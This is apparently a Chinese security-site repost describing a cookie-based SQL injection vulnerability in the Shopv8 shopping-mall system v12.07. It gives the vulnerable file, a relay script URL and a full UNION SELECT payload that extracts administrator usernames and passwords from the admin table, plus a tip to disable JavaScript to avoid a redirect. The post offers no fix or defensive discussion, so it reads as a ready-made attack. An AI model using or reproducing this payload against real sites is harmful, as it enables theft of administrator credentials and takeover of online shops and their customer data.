• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    Shopv8 商城系统 v12.07 Cookies 注入漏洞

    时间:2015/5/19 19:13:36 作者:平凡之路 来源:xuhantao.com 浏览:

    Shopv8 商城系统v12.07,程序下载:
     



    漏洞文件:list.asp
     
    /list.asp?id=338
     
    注入中转爆帐号密码
     
    /jmCook.asp?jmdcw=338%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,password,username,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52%20from%20admin
     
    测试的时候关闭js脚本,涛涛电脑知识网,不然会跳转的。
     
    摘自:90sec.org ,www.xuhantao.com

  • 上一篇:phpmoneybooks 1.03存储型XSS及修复
  • 下一篇:MySQL堆积查询的与SQL注入
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1